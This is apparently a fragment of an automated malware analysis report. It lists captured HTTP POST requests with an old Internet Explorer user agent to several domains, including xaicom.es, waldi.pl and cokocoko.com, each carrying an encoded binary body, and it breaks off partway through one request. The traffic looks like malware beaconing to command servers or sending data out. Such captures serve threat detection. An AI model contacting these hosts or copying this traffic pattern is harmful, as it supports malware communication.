ZOFdP840lvsn20e1WbU3BDEPg2fO1gf/4rkR6Hfg0PGxo14CKvNz194DX0qpxFMAjzttmfhy/EWchpEYFPlKvj7ylYCPityPug3Cz4YYF3Wm3okRCmUjyvHZ4t+sHb7MTYuiJxrCzSRfy2NVzkn5IvWSK4WtrOboRGJH9vn7bbcQ/J8wSqzw7Soz8GMRWb54a9u/2H7OJWEhhVClgYxa19fAAmRPlmLDlby3Jxtta/05FiuiIXqIIJtVyFzg7sRJibsLMeOK2QJWQA9qir7TqO5ypWFO8WGUyPc0ouJwzov+Ta7Zza5MmSnaPnz3czrXWp9te2mprgZF6lQUpNxWCqEDRmgvLwV7Dc0R3OpYmeZAlY8ZJ5j1X9GwOoBOlHtjdm4V125Tbi5yiOX32e+n+HR0+wmi64BGZuD8ckS+M0DYu2uNoTgj17CsqeyeHGBZ6h+aZeQ0XCzVlEyQk/pxnPzTnatMJicEbH3Bcfu/YVyPhXfYLvVjdZRrYS2cKrIDJyw16/EVlD+J+Uk4cLKeB65kSgAfvqA6d/cUG9Gjm/JcA/TJmmLx/kh/KsxZVBaU5ijFBw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 78 46 79 36 72 2b 76 61 6d 66 73 48 50 39 42 4a 77 72 4e 72 73 56 51 67 39 71 71 78 35 2b 6c 57 54 2f 75 37 76 54 2f 63 6e 38 37 37 59 38 59 52 6c 67 7a 62 32 74 75 42 5a 43 61 66 75 69 2f 54 73 76 4f 79 6b 49 38 6e 6d 7a 5a 66 31 6a 46 62 31 70 5a 58 51 56 70 67 58 68 64 4b 34 39 36 78 76 58 38 61 79 77 78 45 6c 45 6d 32 6f 57 45 69 50 4c 6e 62 4b 49 43 4f 71 51 42 67 43 4f 73 78 33 65 37 51 31 70 42 6d 36 37 63 65 79 48 75 57 4e 50 5a 47 34 4f 45 6b 6a 56 39 47 56 61 74 47 39 7a 37 38 69 77 59 33 5a 36 64 38 7a 55 4c 39 47 70 67 33 4f 4e 77 69 58 49 79 30 48 57 5a 70 35 6b 32 71 66 57 41 67 49 46 34 67 35 4e 4c 59 4a 6a 6d 44 44 4b 76 2b 39 76 74 30 64 54 6d 71 6e 77 66 67 4b 64 6d 33 55 63 2f 4f 66 49 56 6a 35 2f 38 69 57 71 70 6b 63 62 4b 58 64 70 58 4b 7a 73 77 50 73 39 2f 62 68 58 72 72 64 6e 69 71 4a 56 57 54 79 70 33 42 6d 31 2f 55 6b 76 4a 72 70 75 76 79 76 69 4c 51 65 77 7a 43 54 74 74 42 79 76 65 62 4e 48 4d 2f 53 36 47 37 35 64 4b 45 53 4b 2b 37 35 4f 58 39 30 79 47 52 6a 44 4c 39 6e 67 52 78 68 75 73 39 64 4e 5a 63 57 36 78 4a 6d 76 5a 75 53 63 45 2f 32 4f 55 55 65 52 79 56 79 6d 69 44 72 58 46 31 62 6b 64 54 36 50 58 37 2b 71 56 6d 48 55 43 35 77 6c 59 58 71 78 62 51 6e 4d 55 45 61 66 31 46 6f 55 76 61 69 4a 46 46 4b 33 4f 56 4c 72 57 7a 39 5a 61 61 47 65 62 77 62 53 6f 39 56 42 36 65 34 58 64 61 4a 73 6f 6c 55 72 65 47 6d 32 73 69 37 41 55 6c 41 4d 32 44 6d 4d 76 53 78 6f 38 6c 30 30 4f 4d 44 78 5a 52 73 53 4a 68 31 64 34 74 65 48 53 65 31 4c 7a 6b 37 6f 30 4f 7a 4e 74 7a 4a 6a 57 66 50 6d 4a 42 59 31 74 6a 59 78 4c 30 43 56 61 4d 41 79 52 4d 62 64 67 6c 75 57 73 6d 48 79 61 43 4a 77 3d 3d Data Ascii: xFy6r+vamfsHP9BJwrNrsVQg9qqx5+lWT/u7vT/cn877Y8YRlgzb2tuBZCafui/TsvOykI8nmzZf1jFb1pZXQVpgXhdK496xvX8aywxElEm2oWEiPLnbKICOqQBgCOsx3e7Q1pBm67ceyHuWNPZG4OEkjV9GVatG9z78iwY3Z6d8zUL9Gpg3ONwiXIy0HWZp5k2qfWAgIF4g5NLYJjmDDKv+9vt0dTmqnwfgKdm3Uc/OfIVj5/8iWqpkcbKXdpXKzswPs9/bhXrrdniqJVWTyp3Bm1/UkvJrpuvyviLQewzCTttByvebNHM/S6G75dKESK+75OX90yGRjDL9ngRxhus9dNZcW6xJmvZuScE/2OUUeRyVymiDrXF1bkdT6PX7+qVmHUC5wlYXqxbQnMUEaf1FoUvaiJFFK3OVLrWz9ZaaGebwbSo9VB6e4XdaJsolUreGm2si7AUlAM2DmMvSxo8l00OMDxZRsSJh1d4teHSe1Lzk7o0OzNtzJjWfPmJBY1tjYxL0CVaMAyRMbdgluWsmHyaCJw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 46 72 30 79 4d 2b 59 66 6e 76 76 30 54 4b 4c 70 67 54 61 69 49 51 6e 69 65 64 72 47 36 36 72 45 65 6b 6f 48 43 43 75 54 5a 31 6d 48 34 77 61 71 76 6d 38 38 57 55 79 4b 70 39 2f 49 6b 77 6b 59 55 57 57 52 44 76 72 4a 35 33 6e 62 64 33 34 77 69 4a 55 45 2f 6e 64 6c 47 70 50 7a 36 45 30 39 7a 2f 4b 6a 44 48 6a 57 6a 45 4f 33 4f 4e 44 63 2f 45 76 70 54 53 39 46 4e 5a 6f 35 53 4d 54 36 66 50 6d 56 4e 4b 52 46 41 78 6e 54 70 44 70 44 69 6e 52 77 31 6f 43 42 44 31 4b 78 42 66 56 53 59 62 54 51 7a 6b 42 42 6c 59 65 53 75 61 57 65 64 2b 67 2f 67 67 62 44 76 72 53 6a 35 77 79 72 36 6f 75 53 57 46 55 68 50 5a 4c 4d 4a 64 2b 6b 2b 6c 38 6d 4a 6f 6a 71 4f 44 52 6c 76 35 33 46 36 41 75 4d 6c 44 49 4b 62 6b 64 79 4c 4d 34 70 4f 6f 34 36 31 43 71 57 57 50 6d 61 4d 46 59 37 31 6e 6c 75 53 6d 42 75 74 6c 57 56 51 70 78 77 67 42 4f 47 2f 74 39 52 74 2f 65 47 76 4a 52 59 73 69 31 4f 69 62 2b 57 35 78 70 6b 73 36 35 67 55 53 67 38 6b 33 30 54 78 2f 67 5a 6d 69 54 32 49 30 44 50 49 66 71 65 4b 58 2b 4f 58 35 70 78 78 52 6d 61 38 6e 66 35 56 45 55 49 38 59 45 79 35 42 2b 48 54 51 47 64 63 6a 4f 45 56 37 51 6c 67 6c 61 62 39 50 45 69 2b 66 67 62 46 61 36 34 56 57 4d 35 67 76 6d 44 5a 47 51 66 6d 7a 52 32 4d 2f 56 6e 52 57 30 66 69 4f 36 54 76 2b 77 56 37 47 59 78 56 34 54 54 6e 7a 79 44 55 78 53 62 79 5a 31 6d 6c 71 6a 35 35 65 2b 33 41 68 61 79 75 4c 63 6b 51 6d 38 4a 65 43 39 38 6d 34 4d 48 67 41 45 78 43 42 55 68 70 75 53 6d 4b 65 36 79 78 7a 78 75 55 6e 30 7a 49 71 33 50 65 2b 4e 4b 78 58 6b 31 57 56 64 56 51 63 64 68 2f 35 70 77 5a 46 48 4a 68 55 44 65 4a 66 71 4a 33 4f 31 33 71 64 4f 61 41 78 6f 46 6e 6b 78 47 32 48 53 4c 79 43 36 79 77 35 32 62 61 33 53 33 77 4f 45 78 63 6b 42 73 35 6f 67 74 42 49 31 48 46 39 2f 50 2b 59 6f 37 Data Ascii: Fr0yM+Yfnvv0TKLpgTaiIQniedrG66rEekoHCCuTZ1mH4waqvm88WUyKp9/IkwkYUWWRDvrJ53nbd34wiJUE/ndlGpPz6E09z/KjDHjWjEO3ONDc/EvpTS9FNZo5SMT6fPmVNKRFAxnTpDpDinRw1oCBD1KxBfVSYbTQzkBBlYeSuaWed+g/ggbDvrSj5wyr6ouSWFUhPZLMJd+k+l8mJojqODRlv53F6AuMlDIKbkdyLM4pOo461CqWWPmaMFY71nluSmButlWVQpxwgBOG/t9Rt/eGvJRYsi1Oib+W5xpks65gUSg8k30Tx/gZmiT2I0DPIfqeKX+OX5pxxRma8nf5VEUI8YEy5B+HTQGdcjOEV7Qlglab9PEi+fgbFa64VWM5gvmDZGQfmzR2M/VnRW0fiO6Tv+wV7GYxV4TTnzyDUxSbyZ1mlqj55e+3AhayuLckQm8JeC98m4MHgAExCBUhpuSmKe6yxzxuUn0zIq3Pe+NKxXk1WVdVQcdh/5pwZFHJhUDeJfqJ3O13qdOaAxoFnkxG2HSLyC6yw52ba3S3wOExckBs5ogtBI1HF9/P+Yo7
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 78 46 79 36 72 2b 76 61 6d 66 73 48 50 39 42 4a 77 72 4e 72 73 56 51 67 39 71 71 78 35 2b 6c 57 54 2f 75 37 76 54 2f 63 6e 38 37 37 59 38 59 52 6c 67 7a 62 32 74 75 42 5a 43 61 66 75 69 2f 54 73 76 4f 79 6b 49 38 6e 6d 7a 5a 66 31 6a 46 62 31 70 5a 58 51 56 70 67 58 68 64 4b 34 39 36 78 76 58 38 61 79 77 78 45 6c 45 6d 32 6f 57 45 69 50 4c 6e 62 4b 49 43 4f 71 51 42 67 43 4f 73 78 33 65 37 51 31 70 42 6d 36 37 63 65 79 48 75 57 4e 50 5a 47 34 4f 45 6b 6a 56 39 47 56 61 74 47 39 7a 37 38 69 77 59 33 5a 36 64 38 7a 55 4c 39 47 70 67 33 4f 4e 77 69 58 49 79 30 48 57 5a 70 35 6b 32 71 66 57 41 67 49 46 34 67 35 4e 4c 59 4a 6a 6d 44 44 4b 76 2b 39 76 74 30 64 54 6d 71 6e 77 66 67 4b 64 6d 33 55 63 2f 4f 66 49 56 6a 35 2f 38 69 57 71 70 6b 63 62 4b 58 64 70 58 4b 7a 73 77 50 73 39 2f 62 68 58 72 72 64 6e 69 71 4a 56 57 54 79 70 33 42 6d 31 2f 55 6b 76 4a 72 70 75 76 79 76 69 4c 51 65 77 7a 43 54 74 74 42 79 76 65 62 4e 48 4d 2f 53 36 47 37 35 64 4b 45 53 4b 2b 37 35 4f 58 39 30 79 47 52 6a 44 4c 39 6e 67 52 78 68 75 73 39 64 4e 5a 63 57 36 78 4a 6d 76 5a 75 53 63 45 2f 32 4f 55 55 65 52 79 56 79 6d 69 44 72 58 46 31 62 6b 64 54 36 50 58 37 2b 71 56 6d 48 55 43 35 77 6c 59 58 71 78 62 51 6e 4d 55 45 61 66 31 46 6f 55 76 61 69 4a 46 46 4b 33 4f 56 4c 72 57 7a 39 5a 61 61 47 65 62 77 62 53 6f 39 56 42 36 65 34 58 64 61 4a 73 6f 6c 55 72 65 47 6d 32 73 69 37 41 55 6c 41 4d 32 44 6d 4d 76 53 78 6f 38 6c 30 30 4f 4d 44 78 5a 52 73 53 4a 68 31 64 34 74 65 48 53 65 31 4c 7a 6b 37 6f 30 4f 7a 4e 74 7a 4a 6a 57 66 50 6d 4a 42 59 31 74 6a 59 78 4c 30 43 56 61 4d 41 79 52 4d 62 64 67 6c 75 57 73 6d 48 79 61 43 4a 77 3d 3d Data Ascii: xFy6r+vamfsHP9BJwrNrsVQg9qqx5+lWT/u7vT/cn877Y8YRlgzb2tuBZCafui/TsvOykI8nmzZf1jFb1pZXQVpgXhdK496xvX8aywxElEm2oWEiPLnbKICOqQBgCOsx3e7Q1pBm67ceyHuWNPZG4OEkjV9GVatG9z78iwY3Z6d8zUL9Gpg3ONwiXIy0HWZp5k2qfWAgIF4g5NLYJjmDDKv+9vt0dTmqnwfgKdm3Uc/OfIVj5/8iWqpkcbKXdpXKzswPs9/bhXrrdniqJVWTyp3Bm1/UkvJrpuvyviLQewzCTttByvebNHM/S6G75dKESK+75OX90yGRjDL9ngRxhus9dNZcW6xJmvZuScE/2OUUeRyVymiDrXF1bkdT6PX7+qVmHUC5wlYXqxbQnMUEaf1FoUvaiJFFK3OVLrWz9ZaaGebwbSo9VB6e4XdaJsolUreGm2si7AUlAM2DmMvSxo8l00OMDxZRsSJh1d4teHSe1Lzk7o0OzNtzJjWfPmJBY1tjYxL0CVaMAyRMbdgluWsmHyaCJw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 62 57 31 63 6b 6f 48 58 73 66 74 4b 2f 51 58 6e 59 45 72 74 36 31 72 4c 59 52 54 2f 42 6f 50 6c 52 57 34 69 47 62 50 36 72 69 4d 33 6e 78 36 56 48 63 51 45 5a 65 4e 71 58 68 59 6e 30 70 76 63 71 32 31 6d 49 38 4a 6d 68 77 65 61 35 52 75 49 6f 30 70 72 68 75 4f 70 73 52 4b 4e 46 4d 71 79 70 57 35 4d 51 79 32 41 43 53 4f 6d 46 65 42 33 4e 76 56 52 4f 70 6f 38 71 59 49 6b 33 68 65 53 78 4f 37 79 58 54 6c 70 66 50 43 49 62 54 62 4e 46 74 61 47 43 52 2b 54 31 37 42 33 2b 6c 71 62 54 38 47 61 76 78 78 75 4a 50 44 52 71 45 76 34 4e 6e 65 37 55 48 59 47 74 73 58 65 51 6d 43 42 74 6d 4b 59 74 4e 73 58 74 4c 71 6e 2b 55 70 75 2f 52 6a 65 47 4a 69 2f 36 41 4f 6e 7a 4a 55 5a 50 6b 32 4f 2b 2f 79 6e 33 73 6e 42 35 59 31 68 66 55 71 78 38 48 67 69 32 2b 75 4e 50 41 69 7a 6e 75 41 34 33 6f 61 53 64 55 78 54 2f 44 46 30 46 53 38 42 6b 70 72 75 37 2b 45 53 6b 2b 31 34 5a 35 73 66 43 52 66 36 38 57 49 7a 6c 4e 50 47 2f 34 58 42 79 36 68 31 65 35 69 53 39 53 69 55 76 32 35 43 6c 6f 6f 55 37 57 4d 63 5a 51 4c 32 57 4e 65 44 6a 79 46 33 65 32 49 49 64 70 4d 2b 63 6b 6c 76 31 68 61 52 55 6e 46 35 75 30 61 6d 34 32 51 75 47 4b 72 7a 6e 77 6a 2f 32 4c 4e 6e 4f 77 6d 38 38 75 2b 62 39 70 7a 2b 65 30 77 54 4f 47 46 4b 45 37 2f 53 6f 4f 52 54 6f 33 5a 30 50 2b 39 72 31 6c 72 69 42 79 6c 74 70 37 53 66 78 77 69 63 33 47 6b 36 4c 59 53 63 39 56 34 31 59 72 62 6e 77 64 35 63 79 34 57 4e 78 4e 4d 45 74 62 41 4e 6f 4a 72 4e 77 69 43 72 53 2b 6a 64 6a 52 33 46 4c 72 45 4b 55 2f 36 43 52 50 59 78 7a 5a 43 36 6a 56 66 77 36 4c 48 2b 73 62 38 4a 4e 51 55 31 69 43 67 68 65 68 78 46 5a 4f 6a 56 46 51 42 46 6f 46 7a 62 62 4b 7a 64 4a 56 53 7a 5a 51 76 42 6d 45 53 33 70 37 6e 70 75 76 4d 57 47 77 3d 3d Data Ascii: bW1ckoHXsftK/QXnYErt61rLYRT/BoPlRW4iGbP6riM3nx6VHcQEZeNqXhYn0pvcq21mI8Jmhwea5RuIo0prhuOpsRKNFMqypW5MQy2ACSOmFeB3NvVROpo8qYIk3heSxO7yXTlpfPCIbTbNFtaGCR+T17B3+lqbT8GavxxuJPDRqEv4Nne7UHYGtsXeQmCBtmKYtNsXtLqn+Upu/RjeGJi/6AOnzJUZPk2O+/yn3snB5Y1hfUqx8Hgi2+uNPAiznuA43oaSdUxT/DF0FS8Bkpru7+ESk+14Z5sfCRf68WIzlNPG/4XBy6h1e5iS9SiUv25ClooU7WMcZQL2WNeDjyF3e2IIdpM+cklv1haRUnF5u0am42QuGKrznwj/2LNnOwm88u+b9pz+e0wTOGFKE7/SoORTo3Z0P+9r1lriByltp7Sfxwic3Gk6LYSc9V41Yrbnwd5cy4WNxNMEtbANoJrNwiCrS+jdjR3FLrEKU/6CRPYxzZC6jVfw6LH+sb8JNQU1iCghehxFZOjVFQBFoFzbbKzdJVSzZQvBmES3p7npuvMWGw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 46 72 30 79 4d 2b 59 66 6e 76 76 30 54 4b 4c 70 67 54 61 69 49 51 6e 69 65 64 72 47 36 36 72 45 65 6b 6f 48 43 43 75 54 5a 31 6d 48 34 77 61 71 76 6d 38 38 57 55 79 4b 70 39 2f 49 6b 77 6b 59 55 57 57 52 44 76 72 4a 35 33 6e 62 64 33 34 77 69 4a 55 45 2f 6e 64 6c 47 70 50 7a 36 45 30 39 7a 2f 4b 6a 44 48 6a 57 6a 45 4f 33 4f 4e 44 63 2f 45 76 70 54 53 39 46 4e 5a 6f 35 53 4d 54 36 66 50 6d 56 4e 4b 52 46 41 78 6e 54 70 44 70 44 69 6e 52 77 31 6f 43 42 44 31 4b 78 42 66 56 53 59 62 54 51 7a 6b 42 42 6c 59 65 53 75 61 57 65 64 2b 67 2f 67 67 62 44 76 72 53 6a 35 77 79 72 36 6f 75 53 57 46 55 68 50 5a 4c 4d 4a 64 2b 6b 2b 6c 38 6d 4a 6f 6a 71 4f 44 52 6c 76 35 33 46 36 41 75 4d 6c 44 49 4b 62 6b 64 79 4c 4d 34 70 4f 6f 34 36 31 43 71 57 57 50 6d 61 4d 46 59 37 31 6e 6c 75 53 6d 42 75 74 6c 57 56 51 70 78 77 67 42 4f 47 2f 74 39 52 74 2f 65 47 76 4a 52 59 73 69 31 4f 69 62 2b 57 35 78 70 6b 73 36 35 67 55 53 67 38 6b 33 30 54 78 2f 67 5a 6d 69 54 32 49 30 44 50 49 66 71 65 4b 58 2b 4f 58 35 70 78 78 52 6d 61 38 6e 66 35 56 45 55 49 38 59 45 79 35 42 2b 48 54 51 47 64 63 6a 4f 45 56 37 51 6c 67 6c 61 62 39 50 45 69 2b 66 67 62 46 61 36 34 56 57 4d 35 67 76 6d 44 5a 47 51 66 6d 7a 52 32 4d 2f 56 6e 52 57 30 66 69 4f 36 54 76 2b 77 56 37 47 59 78 56 34 54 54 6e 7a 79 44 55 78 53 62 79 5a 31 6d 6c 71 6a 35 35 65 2b 33 41 68 61 79 75 4c 63 6b 51 6d 38 4a 65 43 39 38 6d 34 4d 48 67 41 45 78 43 42 55 68 70 75 53 6d 4b 65 36 79 78 7a 78 75 55 6e 30 7a 49 71 33 50 65 2b 4e 4b 78 58 6b 31 57 56 64 56 51 63 64 68 2f 35 70 77 5a 46 48 4a 68 55 44 65 4a 66 71 4a 33 4f 31 33 71 64 4f 61 41 78 6f 46 6e 6b 78 47 32 48 53 4c 79 43 36 79 77 35 32 62 61 33 53 33 77 4f 45 78 63 6b 42 73 35 6f 67 74 42 49 31 48 46 39 2f 50 2b 59 6f 37 Data Ascii: Fr0yM+Yfnvv0TKLpgTaiIQniedrG66rEekoHCCuTZ1mH4waqvm88WUyKp9/IkwkYUWWRDvrJ53nbd34wiJUE/ndlGpPz6E09z/KjDHjWjEO3ONDc/EvpTS9FNZo5SMT6fPmVNKRFAxnTpDpDinRw1oCBD1KxBfVSYbTQzkBBlYeSuaWed+g/ggbDvrSj5wyr6ouSWFUhPZLMJd+k+l8mJojqODRlv53F6AuMlDIKbkdyLM4pOo461CqWWPmaMFY71nluSmButlWVQpxwgBOG/t9Rt/eGvJRYsi1Oib+W5xpks65gUSg8k30Tx/gZmiT2I0DPIfqeKX+OX5pxxRma8nf5VEUI8YEy5B+HTQGdcjOEV7Qlglab9PEi+fgbFa64VWM5gvmDZGQfmzR2M/VnRW0fiO6Tv+wV7GYxV4TTnzyDUxSbyZ1mlqj55e+3AhayuLckQm8JeC98m4MHgAExCBUhpuSmKe6yxzxuUn0zIq3Pe+NKxXk1WVdVQcdh/5pwZFHJhUDeJfqJ3O13qdOaAxoFnkxG2HSLyC6yw52ba3S3wOExckBs5ogtBI1HF9/P+Yo7
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 4b 6d 65 37 4a 4e 4d 34 78 2f 76 41 56 6c 31 62 6d 75 6a 4c 38 6e 79 43 61 48 6d 35 4c 79 53 57 74 30 50 52 55 64 4b 52 67 6b 72 6a 42 4c 78 6c 55 4c 70 42 71 59 6f 4a 77 5a 55 73 51 72 70 77 6e 73 2b 76 59 73 2b 35 2b 65 59 50 2f 44 34 79 2b 6a 30 53 50 7a 72 35 61 2f 75 73 6a 7a 62 64 50 43 57 57 37 44 4d 6e 6a 4b 69 6d 78 32 51 33 47 62 58 41 74 73 61 48 30 41 37 74 34 65 4a 68 54 34 6b 44 4b 32 36 39 63 52 6e 69 50 71 48 2f 4b 6d 53 76 44 39 33 6b 56 41 38 41 52 46 6b 67 47 51 4f 7a 6d 2b 61 49 49 39 77 44 7a 35 4d 64 72 42 4a 73 56 68 65 35 2f 44 66 61 62 62 55 2f 48 53 30 54 4f 58 43 6c 59 6e 63 47 43 34 32 66 38 4e 4f 44 79 6a 52 66 69 6f 52 51 2f 5a 66 62 67 42 6d 6b 75 54 44 69 36 64 62 57 75 54 50 6d 33 74 41 53 79 31 56 37 77 58 41 76 66 59 51 7a 69 44 47 76 78 4b 72 57 33 49 7a 53 50 5a 72 54 73 48 77 72 42 51 34 50 2b 51 62 57 70 68 4b 75 49 54 32 76 38 36 63 33 4c 6c 4e 53 30 47 51 34 74 62 48 58 47 54 64 32 2f 62 77 63 34 66 4e 55 43 6e 6a 42 6e 43 35 6a 57 79 4b 59 6d 31 36 4e 50 45 71 62 6b 48 74 63 45 32 51 78 49 6a 53 32 6f 72 76 5a 6a 42 69 64 53 70 62 69 32 57 52 44 2b 66 70 72 2f 53 47 36 62 4e 72 42 75 5a 41 49 46 73 77 6c 70 52 44 35 46 54 59 6b 4b 72 70 49 53 30 75 52 61 76 51 5a 50 58 68 49 72 48 35 4e 32 7a 72 7a 52 4b 70 67 64 44 4b 6a 74 62 79 33 51 4b 46 31 56 79 72 71 44 57 7a 75 49 6f 4d 2b 49 66 36 75 4a 39 7a 49 54 73 56 36 4f 52 64 72 70 48 6c 2b 72 6c 4f 59 53 52 7a 76 78 32 36 72 32 4c 59 41 74 4d 56 53 64 41 58 44 45 4f 50 38 76 61 47 66 79 44 76 45 32 54 6d 63 4d 31 62 69 56 59 35 6a 4a 75 6e 4a 72 4d 67 50 68 52 45 50 78 36 63 4b 31 44 48 71 52 44 69 37 55 56 52 67 69 6a 77 65 37 33 42 54 35 50 67 44 5a 51 6f 49 72 79 4e 2f 55 53 72 44 70 50 79 36 30 38 43 4e 31 56 49 3d Data Ascii: Kme7JNM4x/vAVl1bmujL8nyCaHm5LySWt0PRUdKRgkrjBLxlULpBqYoJwZUsQrpwns+vYs+5+eYP/D4y+j0SPzr5a/usjzbdPCWW7DMnjKimx2Q3GbXAtsaH0A7t4eJhT4kDK269cRniPqH/KmSvD93kVA8ARFkgGQOzm+aII9wDz5MdrBJsVhe5/DfabbU/HS0TOXClYncGC42f8NODyjRfioRQ/ZfbgBmkuTDi6dbWuTPm3tASy1V7wXAvfYQziDGvxKrW3IzSPZrTsHwrBQ4P+QbWphKuIT2v86c3LlNS0GQ4tbHXGTd2/bwc4fNUCnjBnC5jWyKYm16NPEqbkHtcE2QxIjS2orvZjBidSpbi2WRD+fpr/SG6bNrBuZAIFswlpRD5FTYkKrpIS0uRavQZPXhIrH5N2zrzRKpgdDKjtby3QKF1VyrqDWzuIoM+If6uJ9zITsV6ORdrpHl+rlOYSRzvx26r2LYAtMVSdAXDEOP8vaGfyDvE2TmcM1biVY5jJunJrMgPhREPx6cK1DHqRDi7UVRgijwe73BT5PgDZQoIryN/USrDpPy608CN1VI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 5a 4f 46 64 50 38 34 30 6c 76 73 6e 32 30 65 31 57 62 55 33 42 44 45 50 67 32 66 4f 31 67 66 2f 34 72 6b 52 36 48 66 67 30 50 47 78 6f 31 34 43 4b 76 4e 7a 31 39 34 44 58 30 71 70 78 46 4d 41 6a 7a 74 74 6d 66 68 79 2f 45 57 63 68 70 45 59 46 50 6c 4b 76 6a 37 79 6c 59 43 50 69 74 79 50 75 67 33 43 7a 34 59 59 46 33 57 6d 33 6f 6b 52 43 6d 55 6a 79 76 48 5a 34 74 2b 73 48 62 37 4d 54 59 75 69 4a 78 72 43 7a 53 52 66 79 32 4e 56 7a 6b 6e 35 49 76 57 53 4b 34 57 74 72 4f 62 6f 52 47 4a 48 39 76 6e 37 62 62 63 51 2f 4a 38 77 53 71 7a 77 37 53 6f 7a 38 47 4d 52 57 62 35 34 61 39 75 2f 32 48 37 4f 4a 57 45 68 68 56 43 6c 67 59 78 61 31 39 66 41 41 6d 52 50 6c 6d 4c 44 6c 62 79 33 4a 78 74 74 61 2f 30 35 46 69 75 69 49 58 71 49 49 4a 74 56 79 46 7a 67 37 73 52 4a 69 62 73 4c 4d 65 4f 4b 32 51 4a 57 51 41 39 71 69 72 37 54 71 4f 35 79 70 57 46 4f 38 57 47 55 79 50 63 30 6f 75 4a 77 7a 6f 76 2b 54 61 37 5a 7a 61 35 4d 6d 53 6e 61 50 6e 7a 33 63 7a 72 58 57 70 39 74 65 32 6d 70 72 67 5a 46 36 6c 51 55 70 4e 78 57 43 71 45 44 52 6d 67 76 4c 77 56 37 44 63 30 52 33 4f 70 59 6d 65 5a 41 6c 59 38 5a 4a 35 6a 31 58 39 47 77 4f 6f 42 4f 6c 48 74 6a 64 6d 34 56 31 32 35 54 62 69 35 79 69 4f 58 33 32 65 2b 6e 2b 48 52 30 2b 77 6d 69 36 34 42 47 5a 75 44 38 63 6b 53 2b 4d 30 44 59 75 32 75 4e 6f 54 67 6a 31 37 43 73 71 65 79 65 48 47 42 5a 36 68 2b 61 5a 65 51 30 58 43 7a 56 6c 45 79 51 6b 2f 70 78 6e 50 7a 54 6e 61 74 4d 4a 69 63 45 62 48 33 42 63 66 75 2f 59 56 79 50 68 58 66 59 4c 76 56 6a 64 5a 52 72 59 53 32 63 4b 72 49 44 4a 79 77 31 36 2f 45 56 6c 44 2b 4a 2b 55 6b 34 63 4c 4b 65 42 36 35 6b 53 67 41 66 76 71 41 36 64 2f 63 55 47 39 47 6a 6d 2f 4a 63 41 2f 54 4a 6d 6d 4c 78 2f 6b 68 2f 4b 73 78 5a 56 42 61 55 35 69 6a 46 42 77 3d 3d Data Ascii: ZOFdP840lvsn20e1WbU3BDEPg2fO1gf/4rkR6Hfg0PGxo14CKvNz194DX0qpxFMAjzttmfhy/EWchpEYFPlKvj7ylYCPityPug3Cz4YYF3Wm3okRCmUjyvHZ4t+sHb7MTYuiJxrCzSRfy2NVzkn5IvWSK4WtrOboRGJH9vn7bbcQ/J8wSqzw7Soz8GMRWb54a9u/2H7OJWEhhVClgYxa19fAAmRPlmLDlby3Jxtta/05FiuiIXqIIJtVyFzg7sRJibsLMeOK2QJWQA9qir7TqO5ypWFO8WGUyPc0ouJwzov+Ta7Zza5MmSnaPnz3czrXWp9te2mprgZF6lQUpNxWCqEDRmgvLwV7Dc0R3OpYmeZAlY8ZJ5j1X9GwOoBOlHtjdm4V125Tbi5yiOX32e+n+HR0+wmi64BGZuD8ckS+M0DYu2uNoTgj17CsqeyeHGBZ6h+aZeQ0XCzVlEyQk/pxnPzTnatMJicEbH3Bcfu/YVyPhXfYLvVjdZRrYS2cKrIDJyw16/EVlD+J+Uk4cLKeB65kSgAfvqA6d/cUG9Gjm/JcA/TJmmLx/kh/KsxZVBaU5ijFBw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 43 2b 58 53 6c 70 62 38 73 66 76 74 44 64 70 33 63 59 72 43 6d 54 6e 53 5a 53 45 32 76 67 6a 56 4b 68 71 61 66 71 6d 57 66 76 44 69 49 43 44 67 61 6b 4a 39 4e 48 71 78 56 57 72 78 77 30 61 35 50 77 4e 66 6d 62 4c 67 2b 6d 71 49 6e 63 46 78 49 61 53 67 4f 33 50 39 4d 35 67 37 56 4b 4a 6d 48 66 71 76 43 6f 51 77 47 51 62 35 45 31 52 6e 32 63 37 43 2f 36 57 45 61 73 7a 71 63 45 77 63 35 62 6e 50 6b 73 59 42 6b 39 6d 6f 6d 37 36 4a 5a 52 2b 52 57 44 36 46 6a 4e 4d 2b 39 49 45 56 55 72 56 7a 67 42 43 62 72 70 56 49 2f 33 56 78 6c 5a 59 42 30 50 55 41 68 37 55 30 6b 6c 68 69 34 38 4b 72 68 78 71 32 72 72 34 79 6d 47 44 2f 30 73 4f 73 2b 49 6b 79 6b 6a 30 41 53 62 